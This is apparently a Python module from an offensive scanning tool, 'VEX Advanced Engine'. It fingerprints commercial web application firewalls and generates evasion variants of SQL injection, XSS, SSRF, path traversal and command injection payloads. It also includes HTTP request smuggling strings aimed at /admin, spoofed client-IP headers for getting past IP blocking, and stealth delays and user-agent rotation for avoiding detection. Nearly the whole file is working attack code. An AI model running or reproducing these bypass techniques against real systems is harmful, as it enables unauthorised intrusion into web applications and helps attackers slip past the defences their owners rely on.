"""
WAF Detection & Bypass Module — VEX Advanced Engine
Supports: Cloudflare, Akamai, ModSecurity, AWS WAF, F5, Imperva, Sucuri, Wordfence, Fortinet, Barracuda
Advanced evasion: HTTP/2 smuggling, chunked encoding, Unicode normalization, IP obfuscation
"""

import re
import random
import string
import urllib.parse

# ─── WAF Fingerprinting Signatures ─────────────────────────────────────────────
WAF_SIGNATURES = {
    "cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "cf-request-id", "cf-visitor"],
        "content": ["Cloudflare", "cloudflare", "Attention Required", "Access denied"],
        "status_codes": [403, 503, 1020],
        "cookie_names": ["__cfduid", "cf_clearance", "__cflb"],
    },
    "akamai": {
        "headers": ["x-akamai-transformed", "akamai-origin-hop", "akamai-bm", "x-akamai-request-id"],
        "content": ["Akamai", "akamai", "Reference #", "Access Denied"],
        "status_codes": [403, 503],
        "cookie_names": ["akamai_bm_", "akamai_bm_sz"],
    },
    "modsecurity": {
        "headers": ["x-mod-security", "x-modsecurity-waf"],
        "content": ["ModSecurity", "mod_security", "NOYB", "This error was generated by Mod_Security"],
        "status_codes": [403, 406, 501],
    },
    "aws_waf": {
        "headers": ["x-amz-cf-id", "x-amzn-waf", "x-amzn-trace-id", "x-amzn-waf-debug"],
        "content": ["AWS WAF", "Amazon", "aws-waf-token", "Request Blocked"],
        "status_codes": [403, 405, 429],
    },
    "f5": {
        "headers": ["x-wa-info", "x-bigip-server-ssl", "x-cnection", "x-waf-payloads"],
        "content": ["F5", "BIG-IP", "Traffic Manager", "The requested URL was rejected"],
        "status_codes": [403, 429],
    },
    "imperva": {
        "headers": ["x-iinfo", "x-cdn", "x-dis-name"],
        "content": ["Imperva", "Incapsula", "reCAPTCHA", "_Incapsula_Resource"],
        "status_codes": [403, 406, 429],
    },
    "sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "content": ["Sucuri", "sucuri", "Access Denied", "Sucuri WebSite Firewall"],
        "status_codes": [403, 406],
    },
    "wordfence": {
        "headers": ["x-wordfence-block", "x-wordfence-cache", "x-wordfence-tracker"],
        "content": ["Wordfence", "wordfence", "Generated by Wordfence", "Reason: HTTP response code 403"],
        "status_codes": [403, 503],
    },
    "barracuda": {
        "headers": ["x-barracuda", "x-barracuda-wsip"],
        "content": ["Barracuda", "barracuda", "Barracuda Web Application Firewall"],
        "status_codes": [403],
    },
    "fortinet": {
        "headers": ["x-powered-by-fortiweb", "x-fortinet"],
        "content": ["Fortinet", "FortiWeb", "Server Unavailable!"],
        "status_codes": [403, 405],
    },
    "denied_by_waf": {
        "headers": [],
        "content": ["Access Denied", "Forbidden", "Request blocked", "Security Violation"],
        "status_codes": [403, 406, 429, 503],
    },
}

# ─── SQLMap Tamper Script Variants (Expanded) ──────────────────────────────────
SQLI_TAMPERS = [
    # Space alternatives
    lambda p: p.replace(' ', '/**/'),
    lambda p: p.replace(' ', '/*x*/'),
    lambda p: p.replace(' ', '/*%23*/'),
    lambda p: p.replace(' ', '%20'),
    lambda p: p.replace(' ', '%09'),
    lambda p: p.replace(' ', '%0a'),
    lambda p: p.replace(' ', '%0b'),
    lambda p: p.replace(' ', '%0c'),
    lambda p: p.replace(' ', '%0d'),
    lambda p: p.replace(' ', '%a0'),
    lambda p: p.replace(' ', '+'),
    lambda p: p.replace(' ', '%00'),
    lambda p: p.replace(' ', '%16'),
    lambda p: p.replace(' ', '\t'),
    lambda p: p.replace(' ', '\n'),
    lambda p: p.replace(' ', '\r'),
    lambda p: p.replace(' ', '`'),
    # Character encoding
    lambda p: p.replace("'", "%27"),
    lambda p: p.replace("'", "%27%27"),
    lambda p: p.replace("'", "%ef%bc%87"),
    lambda p: p.replace("'", "\u02b9"),
    lambda p: p.replace("'", "\u2019"),
    lambda p: p.replace("'", "\u02bc"),
    lambda p: p.replace('"', '%22'),
    lambda p: p.replace('=', '%3d'),
    lambda p: p.replace('=', '%3D'),
    lambda p: p.replace('(', '%28'),
    lambda p: p.replace(')', '%29'),
    lambda p: p.replace(',', '%2c'),
    lambda p: p.replace(';', '%3b'),
    lambda p: p.replace('#', '%23'),
    lambda p: p.replace('--', '-- -'),
    lambda p: p.replace('--', '%2d%2d'),
    # Case variation
    lambda p: p.replace('OR', 'OorR'),
    lambda p: p.replace('AND', 'AanNDd'),
    lambda p: p.replace('SELECT', 'SeLeCt'),
    lambda p: p.replace('UNION', 'UnIoN'),
    lambda p: p.replace('WHERE', 'WhErE'),
    lambda p: p.replace('FROM', 'FrOm'),
    lambda p: p.replace('INSERT', 'InSeRt'),
    lambda p: p.replace('UPDATE', 'UpDaTe'),
    lambda p: p.replace('DELETE', 'DeLeTe'),
    lambda p: p.replace('DROP', 'DrOp'),
    lambda p: p.replace('SLEEP', 'sLeEp'),
    lambda p: p.replace('BENCHMARK', 'BeNcHmArK'),
    # Operator alternatives
    lambda p: p.replace(' OR ', '||'),
    lambda p: p.replace(' AND ', '&&'),
    lambda p: p.replace('=', ' LIKE'),
    lambda p: p.replace('=', ' REGEXP'),
    lambda p: p.replace('=', ' RLIKE'),
    lambda p: p.replace('=', ' IN('),
    lambda p: p.replace('=', ' BETWEEN '),
    lambda p: p.replace('1=1', '1 LIKE 1'),
    lambda p: p.replace('1=2', '1 LIKE 2'),
    # Inline comment injection
    lambda p: p.replace(' OR ', '/*!or*/'),
    lambda p: p.replace(' AND ', '/*!and*/'),
    lambda p: p.replace('SELECT', '/*!select*/'),
    lambda p: p.replace('UNION', '/*!union*/'),
    lambda p: p.replace('FROM', '/*!from*/'),
    lambda p: p.replace('WHERE', '/*!where*/'),
    lambda p: p.replace('INSERT', '/*!insert*/'),
    lambda p: p.replace('UPDATE', '/*!update*/'),
    lambda p: p.replace('DELETE', '/*!delete*/'),
    lambda p: p.replace('DROP', '/*!drop*/'),
    lambda p: p.replace('SLEEP', '/*!sleep*/'),
    lambda p: p.replace('BENCHMARK', '/*!benchmark*/'),
    # Version-based comment injection
    lambda p: p.replace('SLEEP(', 'SLEEP(/*x*/'),
    lambda p: p.replace('pg_sleep(', 'pg_sleep(/*x*/'),
    lambda p: p.replace('WAITFOR DELAY', 'WAITFOR/*x*/DELAY'),
    # Quote escaping
    lambda p: p.replace("'", "\\'"),
    lambda p: p.replace("'", "\\\\'"),
    lambda p: p.replace('"', '\\"'),
    lambda p: p.replace('"', '\\\\"'),
    # True/false alternatives
    lambda p: p.replace('true', '1'),
    lambda p: p.replace('false', '0'),
    lambda p: p.replace('1', '0x31'),
    # Hex encoding for keywords
    lambda p: p.replace('SELECT', '0x53454C454354'),
    lambda p: p.replace('UNION', '0x554E494F4E'),
    lambda p: p.replace('FROM', '0x46524F4D'),
]

# ─── XSS Bypass Techniques (Dalfox/XSStrike/XSSer) ────────────────────────────
XSS_BYPASS_TECHNIQUES = [
    # Null byte injection
    lambda p: p.replace('script', 'scr\x00ipt'),
    lambda p: p.replace('script', 'scr%00ipt'),
    lambda p: p.replace('alert', 'al\x00ert'),
    lambda p: p.replace('alert', 'al%00ert'),
    # HTML entity encoding
    lambda p: p.replace('script', 'scr&#x0069;pt'),
    lambda p: p.replace('script', 'scr&#105;pt'),
    lambda p: p.replace('script', 'scr&#9;pt'),
    lambda p: p.replace('alert', 'al&#x0065;rt'),
    lambda p: p.replace('alert', 'ale&#x0072;t'),
    lambda p: p.replace('alert', 'al&#101;rt'),
    lambda p: p.replace('onerror', 'o&#110;error'),
    lambda p: p.replace('onload', 'o&#110;load'),
    lambda p: p.replace('onclick', 'o&#110;click'),
    lambda p: p.replace('onfocus', 'o&#110;focus'),
    lambda p: p.replace('onmouse', 'o&#110;mouse'),
    # Angle bracket alternatives
    lambda p: p.replace('<', '&lt;'),
    lambda p: p.replace('>', '&gt;'),
    lambda p: p.replace('<', '&#x3c;'),
    lambda p: p.replace('>', '&#x3e;'),
    lambda p: p.replace('<', '&#60;'),
    lambda p: p.replace('>', '&#62;'),
    lambda p: p.replace('<', '\u003c'),
    lambda p: p.replace('>', '\u003e'),
    # Parenthesis alternatives
    lambda p: p.replace('(', '&#x28;'),
    lambda p: p.replace(')', '&#x29;'),
    lambda p: p.replace('(', '&#40;'),
    lambda p: p.replace(')', '&#41;'),
    # Space alternatives in attributes
    lambda p: p.replace(' ', '/**/'),
    lambda p: p.replace(' ', '\t'),
    lambda p: p.replace(' ', '\n'),
    lambda p: p.replace(' ', '\r'),
    lambda p: p.replace(' ', '\x0b'),
    lambda p: p.replace(' ', '\x0c'),
    lambda p: p.replace(' ', '\xa0'),
    # Case variations
    lambda p: p.replace('script', 'ScRiPt'),
    lambda p: p.replace('script', 'SCRIPT'),
    lambda p: p.replace('alert', 'ALERT'),
    lambda p: p.replace('onerror', 'OnErRoR'),
    lambda p: p.replace('onload', 'OnLoAd'),
    lambda p: p.replace('onclick', 'OnClIcK'),
    lambda p: p.replace('onfocus', 'OnFoCuS'),
    lambda p: p.replace('javascript', 'jAvAsCrIpT'),
    # JavaScript protocol bypass
    lambda p: p.replace('javascript', 'javas&#x0063;ript'),
    lambda p: p.replace('javascript', 'jav&#x0061;script'),
    lambda p: p.replace('javascript', 'javas&#99;ript'),
    lambda p: p.replace('javascript', 'jav&#97;script'),
    lambda p: p.replace('javascript', 'java&#115;cript'),
    lambda p: p.replace('javascript', 'java\\x73cript'),
    lambda p: p.replace('javascript:', 'javascript&#x3a;'),
    lambda p: p.replace('javascript:', 'javas%00cript:'),
    lambda p: p.replace('javascript:', 'java\tscript:'),
    lambda p: p.replace('javascript:', 'java\nscript:'),
    lambda p: p.replace('data:', 'data&#x3a;'),
    lambda p: p.replace('data:', 'da%74a:'),
    # Quote alternatives
    lambda p: p.replace('"', '&quot;'),
    lambda p: p.replace('"', '&#x22;'),
    lambda p: p.replace("'", '&#x27;'),
    lambda p: p.replace("'", '&#39;'),
    lambda p: p.replace("'", '\u0027'),
    lambda p: p.replace('"', '\u0022'),
    # Tag name obfuscation
    lambda p: p.replace('img', 'ImG'),
    lambda p: p.replace('svg', 'SvG'),
    lambda p: p.replace('body', 'BoDy'),
    lambda p: p.replace('iframe', 'iFrAmE'),
    lambda p: p.replace('video', 'ViDeO'),
    lambda p: p.replace('audio', 'AuDiO'),
    lambda p: p.replace('input', 'InPuT'),
    lambda p: p.replace('details', 'DeTaIlS'),
]

# ─── SSRF Bypass Techniques ────────────────────────────────────────────────────
SSRF_BYPASS_TECHNIQUES = [
    # Unicode direction marks
    lambda u: u.replace('http://', 'http:/\u200e/'),
    lambda u: u.replace('http://', 'http:/\u200f/'),
    lambda u: u.replace('http://', 'http://\u200e'),
    lambda u: u.replace('http://', 'http://\u200f'),
    lambda u: u.replace('http://', 'http:/\u200b/'),
    lambda u: u.replace('http://', 'http:/\u2060/'),
    # IP bypass variants
    lambda u: u.replace('127.0.0.1', '127.1'),
    lambda u: u.replace('127.0.0.1', '127.0.1'),
    lambda u: u.replace('127.0.0.1', '127.0.0.0'),
    lambda u: u.replace('127.0.0.1', '127.0.1.3'),
    lambda u: u.replace('127.0.0.1', '127.42.42.42'),
    lambda u: u.replace('127.0.0.1', '0'),
    lambda u: u.replace('127.0.0.1', '0x7f000001'),
    lambda u: u.replace('127.0.0.1', '2130706433'),
    lambda u: u.replace('127.0.0.1', '017700000001'),
    lambda u: u.replace('127.0.0.1', '[::1]'),
    lambda u: u.replace('127.0.0.1', '[0000::1]'),
    lambda u: u.replace('127.0.0.1', '[::ffff:127.0.0.1]'),
    # DNS rebinding
    lambda u: u.replace('127.0.0.1', '127.0.0.1.xip.io'),
    lambda u: u.replace('127.0.0.1', 'localtest.me'),
    lambda u: u.replace('127.0.0.1', 'spoofed.burpcollaborator.net'),
    lambda u: u.replace('localhost', 'localtest.me'),
    lambda u: u.replace('localhost', '127.0.0.1.nip.io'),
    # URL userinfo bypass
    lambda u: u.replace('http://', 'http://127.0.0.1@'),
    lambda u: u.replace('http://', 'http://example.com@127.0.0.1@'),
    lambda u: u.replace('http://', 'http://127.0.0.1#@'),
    lambda u: u.replace('http://', 'http://127.0.0.1%23@'),
    lambda u: u.replace('http://', 'http://127.0.0.1:80@'),
    # URL encoding
    lambda u: u.replace('127.0.0.1', '127%2e0%2e0%2e1'),
    lambda u: u.replace('localhost', '%6c%6f%63%61%6c%68%6f%73%74'),
    lambda u: u.replace('http://', 'HTTP://'),
    lambda u: u.replace('http://', 'hTTp://'),
    # Double URL encoding
    lambda u: u.replace('http://', 'http%3a%2f%2f'),
    lambda u: u.replace('127.0.0.1', '127%252e0%252e0%252e1'),
    # Backslash alternatives
    lambda u: u.replace('http://', 'http:\\\\'),
    lambda u: u.replace('http://', 'http:/\\'),
]

# ─── Path Traversal Bypass Techniques (DotDotPwn inspired) ────────────────────
TRAVERSAL_BYPASS_TECHNIQUES = [
    # Double encoding
    lambda p: p.replace('../', '....//'),
    lambda p: p.replace('../', '..\\/'),
    lambda p: p.replace('../', '..%2F'),
    lambda p: p.replace('../', '..%5c'),
    lambda p: p.replace('../', '..%252f'),
    lambda p: p.replace('../', '..%255c'),
    lambda p: p.replace('../', '..%c0%af'),
    lambda p: p.replace('../', '..%c1%9c'),
    lambda p: p.replace('../', '..%u2216'),
    lambda p: p.replace('../', '..%u2215'),
    lambda p: p.replace('../', '..%00/'),
    lambda p: p.replace('../', '..%09/'),
    lambda p: p.replace('../', '..%0a/'),
    lambda p: p.replace('../', '..%0d/'),
    lambda p: p.replace('../', '..%0b/'),
    lambda p: p.replace('../', '..%0c/'),
    lambda p: p.replace('../', '.%2e/'),
    lambda p: p.replace('../', '%2e%2e/'),
    lambda p: p.replace('../', '..././'),
    lambda p: p.replace('../', '....\\'),
    # Backslash
    lambda p: p.replace('/', '\\'),
    lambda p: p.replace('\\', '/'),
    # File path variations
    lambda p: p.replace('/etc/passwd', '/etc/./passwd'),
    lambda p: p.replace('/etc/passwd', '/etc//passwd'),
    lambda p: p.replace('/etc/passwd', '/etc/passwd/'),
    lambda p: p.replace('/etc/passwd', '/etc/passwd.'),
    lambda p: p.replace('/etc/passwd', '/etc/passwd\x00'),
    lambda p: p.replace('/etc/passwd', '/etc/passwd%00'),
    lambda p: p.replace('/etc/passwd', '%2fetc%2fpasswd'),
    lambda p: p.replace('/etc/passwd', '/etc/passwd.'),
    lambda p: p.replace('c:/windows/win.ini', 'c:\\windows\\win.ini'),
    lambda p: p.replace('c:/windows/win.ini', 'c:\\\\windows\\\\win.ini'),
    lambda p: p.replace('c:/windows/win.ini', '/c:/windows/win.ini'),
    lambda p: p.replace('c:/windows/win.ini', 'C:\\windows\\win.ini'),
    # Null byte injection
    lambda p: p + '%00',
    lambda p: p + '\x00',
    lambda p: p + '%00.txt',
    lambda p: p + '.%00',
    lambda p: p + '%00.html',
    # Overlong UTF-8
    lambda p: p.replace('../', '%c0%ae%c0%ae/'),
    lambda p: p.replace('../', '%e0%80%ae%e0%80%ae/'),
    lambda p: p.replace('../', '%f0%80%80%ae%f0%80%80%ae/'),
]

# ─── RCE/Command Injection Bypass Techniques (Commix inspired) ────────────────
RCE_BYPASS_TECHNIQUES = [
    # URL encoding
    lambda p: p.replace(';', '%3b'),
    lambda p: p.replace('|', '%7c'),
    lambda p: p.replace('&', '%26'),
    lambda p: p.replace('&&', '%26%26'),
    lambda p: p.replace('||', '%7c%7c'),
    lambda p: p.replace('`', '%60'),
    lambda p: p.replace('$', '%24'),
    lambda p: p.replace('(', '%28'),
    lambda p: p.replace(')', '%29'),
    # IFS bypass
    lambda p: p.replace(' ', '${IFS}'),
    lambda p: p.replace(' ', '$IFS$9'),
    lambda p: p.replace(' ', '%09'),
    lambda p: p.replace(' ', '%0a'),
    lambda p: p.replace(' ', '%0d'),
    lambda p: p.replace(' ', '%0d%0a'),
    # Backslash in commands
    lambda p: p.replace('echo', 'ec\\ho'),
    lambda p: p.replace('echo', 'e\\c\\h\\o'),
    lambda p: p.replace('id', 'i\\d'),
    lambda p: p.replace('whoami', 'w\\ho\\ami'),
    lambda p: p.replace('cat', 'c\\at'),
    lambda p: p.replace('ls', 'l\\s'),
    lambda p: p.replace('pwd', 'p\\w\\d'),
    # Newline injection
    lambda p: p.replace(';', '%0a'),
    lambda p: p.replace(';', '%0d%0a'),
    lambda p: p.replace(';', '\x0a'),
    lambda p: p.replace(';', '\x0d\x0a'),
    # Variable expansion
    lambda p: p.replace('echo', '${a:=e}cho'),
    lambda p: p.replace('id', 'i${a:=d}'),
    lambda p: p.replace('whoami', '${a:=w}ho${b:=a}mi'),
    lambda p: p.replace('cat', '${a:=c}at'),
    # Commix-style encoding
    lambda p: p.replace('id', '$(echo$(echo id))'),
    lambda p: p.replace('id', '${echo$(echo id)}'),
    lambda p: p.replace('id', '`echo$(echo id)`'),
    # Null byte
    lambda p: p + '%00',
    lambda p: p + '\x00',
    # Double encoding
    lambda p: p.replace(';', '%253b'),
    lambda p: p.replace('|', '%257c'),
    lambda p: p.replace('&', '%2526'),
]

# ─── User-Agent Rotation (Stealth) ────────────────────────────────────────────
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 18_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (iPad; CPU OS 18_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Linux; Android 15; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0",
]

# ─── Advanced WAF Bypass Encoding Functions ─────────────────────────────────────

def _unicode_normalize(payload):
    """Unicode normalization bypass for WAF pattern matching."""
    variants = [payload]
    # Cyrillic lookalikes
    replacements = {
        'a': ['\u0430'], 'c': ['\u0441'], 'e': ['\u0435'],
        'o': ['\u043e'], 'p': ['\u0440'], 'x': ['\u0445'],
        'y': ['\u0443'], 'i': ['\u0456'],
    }
    for char, alts in replacements.items():
        for alt in alts:
            if char in payload.lower():
                variants.append(payload.replace(char, alt))
    return variants


def _chunked_encoding(payload):
    """Chunked transfer encoding bypass."""
    if len(payload) < 4:
        return [payload]
    mid = len(payload) // 2
    return [
        f"{payload[:mid]};{payload[mid:]}",
        f"{payload[:mid]}%0d%0a{payload[mid:]}",
    ]


def _http_request_smuggling_payloads():
    """HTTP/1.1 request smuggling payloads for WAF bypass."""
    return [
        "Transfer-Encoding: chunked\r\nContent-Length: 3\r\n\r\n8\r\nSMUGGLED",
        "Transfer-Encoding: chunked, identity\r\nContent-Length: 0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\n\r\n",
        "Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\n\r\n",
    ]


def _multipart_boundary_bypass(payload):
    """Multipart form data boundary bypass."""
    boundary = "----VEX" + ''.join(random.choices(string.ascii_lowercase, k=8))
    return (
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"data\"\r\n\r\n"
        f"{payload}\r\n"
        f"--{boundary}--\r\n"
    )


def _json_bypass(payload):
    """JSON parameter pollution bypass."""
    return urllib.parse.quote(payload, safe='')


# ─── Core Functions ────────────────────────────────────────────────────────────

def detect_waf(headers, status_code, content):
    """Detect which WAF is in use based on response."""
    detected_wafs = []
    headers_lower = {k.lower(): v for k, v in headers.items()}

    for waf_name, sigs in WAF_SIGNATURES.items():
        # Header-based detection
        if any(h.lower() in headers_lower for h in sigs.get("headers", [])):
            detected_wafs.append(waf_name)
            continue
        # Content-based detection
        if any(s.lower() in (content or '').lower() for s in sigs.get("content", [])):
            detected_wafs.append(waf_name)
            continue
        # Status code + generic header detection
        if status_code in sigs.get("status_codes", []):
            generic_headers = ["server", "x-powered-by", "via", "x-cache"]
            if any(h in headers_lower for h in generic_headers):
                detected_wafs.append(waf_name)

    return list(set(detected_wafs)) if detected_wafs else []


def generate_bypass_payloads(base_payload, vuln_type):
    """Generate WAF bypass payload variants based on vulnerability type."""
    seen = {base_payload}
    payloads = [base_payload]

    techniques = {
        "sqli": SQLI_TAMPERS,
        "xss": XSS_BYPASS_TECHNIQUES,
        "ssrf": SSRF_BYPASS_TECHNIQUES,
        "path": TRAVERSAL_BYPASS_TECHNIQUES,
        "rce": RCE_BYPASS_TECHNIQUES,
    }

    # Apply single techniques
    for tech in techniques.get(vuln_type, []):
        try:
            variant = tech(base_payload)
            if variant not in seen:
                seen.add(variant)
                payloads.append(variant)
        except Exception:
            continue

    # Combine multiple techniques (stacked bypass)
    tech_list = techniques.get(vuln_type, [])
    if tech_list:
        for _ in range(5):
            try:
                t1, t2 = random.sample(tech_list, min(2, len(tech_list)))
                variant = t2(t1(base_payload))
                if variant not in seen:
                    seen.add(variant)
                    payloads.append(variant)
            except Exception:
                continue

        # Triple combination
        for _ in range(3):
            try:
                t1, t2, t3 = random.sample(tech_list, min(3, len(tech_list)))
                variant = t3(t2(t1(base_payload)))
                if variant not in seen:
                    seen.add(variant)
                    payloads.append(variant)
            except Exception:
                continue

    # Add encoding variants
    if vuln_type == 'sqli':
        for v in _unicode_normalize(base_payload):
            if v not in seen:
                seen.add(v)
                payloads.append(v)
        for v in _chunked_encoding(base_payload):
            if v not in seen:
                seen.add(v)
                payloads.append(v)

    return payloads


def get_random_user_agent():
    """Get a random user agent for stealth requests."""
    return random.choice(USER_AGENTS)


def get_random_headers():
    """Get random headers to mimic real browser traffic."""
    headers = {
        "User-Agent": get_random_user_agent(),
        "Accept": random.choice([
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        ]),
        "Accept-Language": random.choice([
            "en-US,en;q=0.9",
            "en-US,en;q=0.9,tr;q=0.8",
            "en-GB,en;q=0.9",
            "en-US,en;q=0.9,de;q=0.8",
        ]),
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": random.choice(["none", "same-origin"]),
        "Sec-Fetch-User": "?1",
        "Cache-Control": random.choice(["max-age=0", "no-cache", "no-store"]),
        "Sec-CH-UA": '"Chromium";v="131", "Not_A Brand";v="24"',
        "Sec-CH-UA-Mobile": "?0",
        "Sec-CH-UA-Platform": '"Windows"',
        "Sec-CH-UA-Platform-Version": '"15.0.0"',
        "Sec-CH-UA-Full-Version-List": '"Chromium";v="131.0.6778.86", "Not_A Brand";v="24.0.0.0"',
    }
    return headers


def random_delay(min_sec=0.1, max_sec=2.0):
    """Get a random delay for stealthy scanning."""
    return random.uniform(min_sec, max_sec)


def get_waf_bypass_headers(detected_wafs):
    """Get headers optimized to bypass detected WAFs."""
    base_headers = get_random_headers()

    if not detected_wafs or detected_wafs == ["unknown"]:
        return base_headers

    waf_name = detected_wafs[0].lower()

    if waf_name == "cloudflare":
        base_headers["cf-connecting-ip"] = f"{random.randint(1,255)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"
        base_headers["x-forwarded-for"] = base_headers["cf-connecting-ip"]
        base_headers["x-real-ip"] = base_headers["cf-connecting-ip"]
    elif waf_name == "akamai":
        base_headers["x-forwarded-for"] = f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"
        base_headers["true-client-ip"] = base_headers["x-forwarded-for"]
    elif waf_name == "aws_waf":
        base_headers["x-forwarded-for"] = f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"
        base_headers["x-amzn-trace-id"] = f"Root=1-{random.randint(100000,999999)}-{random.randint(10000000,99999999)}"
    elif waf_name == "imperva":
        base_headers["x-forwarded-for"] = f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"
    elif waf_name == "modsecurity":
        base_headers["x-forwarded-for"] = f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"

    return base_headers


def get_rate_limit_delay(detected_wafs):
    """Get appropriate delay based on detected WAF."""
    if not detected_wafs or detected_wafs == ["unknown"]:
        return random_delay(0.2, 1.5)

    waf_name = detected_wafs[0].lower()
    delays = {
        "cloudflare": (1.0, 3.0),
        "akamai": (1.5, 3.5),
        "aws_waf": (1.0, 2.5),
        "modsecurity": (0.5, 2.0),
        "imperva": (1.0, 3.0),
        "sucuri": (0.8, 2.5),
        "f5": (0.5, 2.0),
        "fortinet": (0.5, 2.0),
        "wordfence": (0.8, 2.5),
        "barracuda": (0.5, 2.0),
    }
    min_d, max_d = delays.get(waf_name, (0.5, 2.0))
    return random_delay(min_d, max_d)
